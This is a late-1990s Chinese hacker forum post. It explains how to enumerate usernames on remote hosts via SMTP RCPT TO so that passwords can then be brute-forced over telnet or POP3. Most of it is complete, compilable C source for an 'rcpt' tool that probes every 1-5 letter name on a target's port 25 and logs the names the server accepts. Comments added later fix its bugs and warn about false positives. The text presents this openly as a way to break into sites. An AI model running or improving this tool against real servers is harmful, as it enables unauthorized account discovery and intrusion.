发信人: zer9() 
整理人: williamlong(1999-09-28 22:15:37), 站内信件
 
 
cgi ,anonymous ftp,remote overflow...
 当用尽了你所知道的技巧也不能进入站点时,
 这时你只有两个选择:1。放弃 2。使用早已被你遗弃
 的暴力法,强行突破。:)(I'd like this 0ne:)但为了
 捍卫hacker的荣誉,当然是不能就此罢休的:)
 如果让你在 telnet+/etc/passwd 与 一个(或几个)用户名
 +pop3hack 之间选一样,你会选哪一样?我选前者。试试就知道了。
 确定远程主机上的用户名有如下几种方法: 
 1.通过 finger、rusers 之类的服务。
   (如 isp)
 2.通过漏洞直接得到 /etc/passwd,或者拿到包含 passwd 内容的 core 文件。
   (如sunos)
 3.通过报纸,杂志慢慢的收集 :)
   (如。。。 电脑报 :)
 4.通过 SMTP(TCP 25 端口)。
 ...(还有什么遗漏的请告诉我哟:)
 一般情况下前两种都是管理员重点防范的对象,除非是
 那些烂站;第三种你有耐心也可一试;
 而第四种则是 SMTP 协议本身固有的缺陷(它用回应码告诉你收件人是否存在),
 再加上 SMTP 的重要性,绝大多数的站点都不会把它关掉。
 这也就成了我们利用的对象。在 SMTP 的命令中,有价值
 的有如下几种:VRFY、EXPN、RCPT,都可以利用。
 但我测试的结果 RCPT 最快(VRFY/EXPN 常被管理员禁用,RCPT TO 却不能禁,否则就收不了信)。
 注意两点:如果服务器对任何收件人都回 250(例如到投递阶段才校验,或者设了 catch-all),
 枚举出来的结果就全是假阳性,先拿一个肯定不存在的名字试一下;另外连续大量 RCPT 失败
 很可能触发限速或被直接断开连接。具体程序如下。
                                                                 zer9@21cn.com
 ----Cut Here --------------------------------------------------------- ------
 
 
 /* 通过"rcpt" 获得远程主机上的用户列表->/etc/passwd
  *  thr0ugh "rcpt" gain rem0te server's user list  
  *                       by                               
  *                      zer9
  *                   
  *                  [email protected]
  *
  *          test on:slackware 2.0.34&irix6.4
  *               cc rcpt.c -o rcpt
  *         后台运行:nohup ./rcpt <Target>&
  */    
                 
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <netinet/in.h>
 #include <sys/types.h>
 #include <sys/stat.h>
 #include <sys/time.h>
 #include <fcntl.h>
 #include <netdb.h>
 #include <unistd.h>
 #include <sys/socket.h>
 #include <signal.h>
 #include <ctype.h>
 #include <arpa/inet.h>
 
 #define  SMTPPORT   25            /* TCP port connect()ed to on the target */
 #define  VERSION     "0.08"       /* printed in the usage banner and the log header */
 #define  LogFile    "./rcpt.log"  /* opened in append mode; every reply worth keeping goes here */
 #define  TIMEOUT    200           /* per-probe timeout in seconds (see main) */
 #define  SleepTime  1             /* seconds waited between sending a RCPT and reading its reply */
 
 int ver(void);
 int look_up(int sock,char *string,char *buff);
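 /*
  * Send one SMTP command line: `string` followed by a newline.
  *
  * Returns 0 when the whole line was written, -1 when string is NULL, the
  * line does not fit the SMTP command-line limit, or send() fails.
  *
  * The original copied strlen(string) bytes into a 100-byte stack buffer
  * with strncpy(), so any argument of 99+ characters overflowed it; here
  * the line is built with snprintf() and over-long input is rejected.
  * Partial writes are retried until the line is out, and the send()
  * result is no longer ignored.
  *
  * NOTE(review): RFC 5321 specifies CRLF line endings; this keeps the bare
  * LF the tool was tested with (sendmail 8.8.x accepted it) so behaviour
  * against those servers is unchanged, but a strict server may reject it.
  */
 int writeln(int sock, const char *string)
 {
     char sendbuf[512];          /* RFC 5321 4.5.3.1.4: max command line incl. CRLF */
     const char *p;
     int len;

     if (string == NULL)
         return -1;
     len = snprintf(sendbuf, sizeof sendbuf, "%s\n", string);
     if (len < 0 || (size_t)len >= sizeof sendbuf)
         return -1;              /* would have been truncated: refuse to send a mangled command */
     p = sendbuf;
     while (len > 0) {
         ssize_t n = send(sock, p, (size_t)len, 0);
         if (n < 0)
             return -1;
         p += n;
         len -= (int)n;
     }
     return 0;
 }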
 
 int s;       /* the connected SMTP socket; set in main(), passed to look_up() */
 FILE *fp;    /* LogFile handle; opened in main(), written by ver() and look_up() */
 
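 /* Longest recipient name the brute-force pass generates ("aaaaa"). */
 enum { MAX_NAME_LEN = 5 };

 /*
  * Read one SMTP reply into reply[0..cap-1] and NUL-terminate it.
  * Returns the byte count, 0 if the peer closed the connection, -1 on
  * error (which includes expiry of the SO_RCVTIMEO set in main()).
  *
  * The original recv()'d sizeof(buffer) bytes and then used the buffer
  * as a C string; a reply of 1000+ bytes left it unterminated and the
  * following strstr()/fprintf("%s") read past its end.
  */
 static int read_reply(int sock, char *reply, size_t cap)
 {
     ssize_t n;

     if (cap == 0)
         return -1;
     n = recv(sock, reply, cap - 1, 0);
     if (n < 0) {
         reply[0] = '\0';
         return -1;
     }
     reply[n] = '\0';
     return (int)n;
 }

 /*
  * Send one command line and read the reply into reply[]; the caller
  * decides what to log.  Returns 0 on success, -1 when the send failed,
  * the read failed or the server closed the connection.
  */
 static int exchange(int sock, const char *cmd, char *reply, size_t cap)
 {
     if (writeln(sock, (char *)cmd) < 0)
         return -1;
     return read_reply(sock, reply, cap) > 0 ? 0 : -1;
 }

 /*
  * Resolve host -- a DNS name or a dotted quad -- into *addr.
  * Returns 0 on success, -1 when neither lookup form yields an IPv4 address.
  *
  * Only AF_INET answers are accepted: the original bcopy()'d h_length
  * bytes into a 4-byte in_addr, which overflows it on a 16-byte record.
  */
 static int resolve_target(const char *host, struct in_addr *addr)
 {
     struct hostent *he = gethostbyname(host);

     if (he != NULL) {
         if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof *addr)
             return -1;
         memcpy(addr, he->h_addr_list[0], sizeof *addr);
         return 0;
     }
     addr->s_addr = inet_addr(host);
     return addr->s_addr == INADDR_NONE ? -1 : 0;
 }

 /*
  * Probe every lowercase recipient name of exactly len letters in
  * dictionary order ("a".."z", "aa".."zz", ...), one "rcpt to: NAME" per
  * name, and hand each reply to look_up(), which logs the accepted ones.
  * This replaces the five hand-unrolled nested loops of the original.
  * Returns 0 when the whole space was covered, -1 on a connection error.
  */
 static int probe_names(int sock, int len, char *reply, size_t cap)
 {
     char name[MAX_NAME_LEN + 1];
     char cmd[sizeof "rcpt to: " + MAX_NAME_LEN];
     int i;

     if (len < 1 || len > MAX_NAME_LEN)
         return -1;
     memset(name, 'a', (size_t)len);
     name[len] = '\0';
     for (;;) {
         snprintf(cmd, sizeof cmd, "rcpt to: %s", name);
         if (writeln(sock, cmd) < 0)
             return -1;
         sleep(SleepTime);           /* pace the probes, as the original did */
         if (read_reply(sock, reply, cap) <= 0)
             return -1;
         look_up(sock, cmd, reply);
         /* odometer step: bump the last letter, carrying 'z' -> 'a' leftwards */
         for (i = len - 1; i >= 0 && name[i] == 'z'; i--)
             name[i] = 'a';
         if (i < 0)
             return 0;               /* wrapped past "zzz..": this length is exhausted */
         name[i]++;
     }
 }

 /*
  * Entry point: rcpt <Target>.  Connects to port 25 on Target, logs the
  * greeting and the HELP, RSET, HELO and MAIL FROM replies to LogFile, then
  * sends "rcpt to: NAME" for every 1..5-letter lowercase NAME and logs the
  * names the server accepts (see look_up()).  Returns 0 on a completed run,
  * -1 on a usage, I/O or connection error.
  *
  * Cost: 26 + 26^2 + 26^3 + 26^4 + 26^5 = 12,356,630 probes, each paced by
  * sleep(SleepTime); at 1 s that is about 143 days.  Only the 1-3 letter
  * rounds (18,278 probes, ~5 h) are realistic; the 4-letter round alone adds
  * ~5.3 days.  Run it under nohup as the header suggests and read LogFile
  * while it runs -- look_up() flushes after every probe.
  */
 int main(int argc, char *argv[])
 {
     struct sockaddr_in sin;
     struct in_addr target;
     struct timeval tv;
     char reply[1000];
     int len;
     int rc = -1;

     if (argc != 2) {
         printf("Rcpt %s   by zer9[FTT]  mailto: [email protected]\n", VERSION);
         printf("Usage: %s <Target>\n", argv[0]);
         return -1;
     }
     if ((fp = fopen(LogFile, "a+")) == NULL) {
         perror("fopen");
         return -1;
     }
     if (resolve_target(argv[1], &target) < 0) {
         /* not perror(): errno carries nothing useful after a failed lookup */
         fprintf(stderr, "cannot resolve %s\n", argv[1]);
         goto out_log;
     }
     ver();
     fprintf(fp, "@Target: %s   ", argv[1]);
     if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
         perror("sock");
         goto out_log;
     }
     /*
      * Per-recv timeout in place of the original alarm(TIMEOUT) with no
      * SIGALRM handler, whose default action killed the process outright.
      * Now a stalled server makes recv() fail and the run ends through the
      * normal cleanup below, with the log closed properly.
      */
     tv.tv_sec = TIMEOUT;
     tv.tv_usec = 0;
     if (setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv) < 0) {
         perror("setsockopt");
         goto out_sock;
     }
     memset(&sin, 0, sizeof sin);
     sin.sin_family = AF_INET;
     sin.sin_port = htons(SMTPPORT);
     sin.sin_addr = target;
     if (connect(s, (struct sockaddr *)&sin, sizeof sin) < 0) {
         perror("connect");
         goto out_sock;
     }
     fprintf(fp, "========================================================= ======\n");
     if (read_reply(s, reply, sizeof reply) <= 0) {     /* 220 greeting */
         fprintf(stderr, "no SMTP greeting from %s\n", argv[1]);
         goto out_sock;
     }
     fprintf(fp, "%s\n", reply);
     if (exchange(s, "help", reply, sizeof reply) < 0) {
         fprintf(stderr, "connection lost during HELP\n");
         goto out_sock;
     }
     fprintf(fp, "%s", reply);
     /*
      * RCPT is mandatory in every SMTP server (it is how mail is addressed),
      * so its absence from the HELP text only means this server does not list
      * its commands -- the original exited here and skipped such targets, and
      * mis-used perror(), appending an unrelated errno text.  Warn and go on.
      * NOTE(review): a HELP text longer than the buffer leaves its tail in the
      * socket, where it shows up in the next replies; the original had the
      * same problem.
      */
     if (strstr(reply, "RCPT") == NULL) {
         fprintf(stderr, "warning: HELP does not list RCPT, probing anyway\n");
         fprintf(fp, "warning: HELP does not list RCPT, probing anyway\n");
     }
     fprintf(fp, "------------------------------------\n");
     if (exchange(s, "RSET", reply, sizeof reply) < 0)
         goto out_proto;
     fprintf(fp, "%s", reply);
     if (exchange(s, "HELO default", reply, sizeof reply) < 0)
         goto out_proto;
     fprintf(fp, "%s", reply);
     if (exchange(s, "mail from: [email protected]", reply, sizeof reply) < 0)
         goto out_proto;
     fprintf(fp, "%s", reply);
     fprintf(fp, "------------------------------------\n");

     for (len = 1; len <= MAX_NAME_LEN; len++)
         if (probe_names(s, len, reply, sizeof reply) < 0)
             goto out_proto;
     rc = 0;

 out_proto:
     writeln(s, "QUIT");     /* end the session cleanly; the original just closed the socket */
     fprintf(fp, "========================================================= ====\n");
     if (rc == 0)
         fprintf(fp, "okay!\n\n\n\n\n");
     else
         fprintf(fp, "aborted: connection lost or timed out\n\n\n\n\n");
 out_sock:
     close(s);
 out_log:
     fclose(fp);
     return rc;
 }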
  
  
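 /*
  * Log a RCPT TO reply that shows the server accepted the recipient, i.e.
  * the probed name exists (or is aliased/forwarded).  `string` is the
  * command that was sent; it is unused but kept for the existing call sites.
  * Returns 1 when the reply was logged as a hit, 0 otherwise (callers of the
  * original ignored the return value, so this is backward compatible).
  *
  * The original matched only the sendmail 8.8.x text "Recipient ok"; other
  * MTAs word the success line differently, so a reply whose status code is
  * 250 (or 251, "user not local; will forward") is counted as well.
  * NOTE(review): a server that accepts every recipient at RCPT time
  * (catch-all, or verification deferred to delivery) turns every probe into
  * a hit -- try a surely-bogus name first before trusting the list.
  */
 int look_up(int sock, char *string, char *buff)
 {
     int hit;

     (void)sock;
     (void)string;
     if (buff == NULL)
         return 0;
     hit = strstr(buff, "ent ok") != NULL          /* sendmail 8.8.7: "... Recipient ok" */
        || strncmp(buff, "250", 3) == 0
        || strncmp(buff, "251", 3) == 0;
     if (hit)
         fprintf(fp, "%s", buff);
     fflush(fp);     /* keep the log current: a run lasts days and may be killed any time */
     return hit;
 }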
     
 /*
  * Write the per-run banner (tool name and VERSION) to the log file.
  * Always returns 0.
  */
 int ver(void)
 {
     fprintf(fp,
             "\n###############################\n"
             "Rcpt %s   by zer9[FTT]  mailto: [email protected]\n",
             VERSION);
     return 0;
 }
  
  
  -- ※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.103.105.75]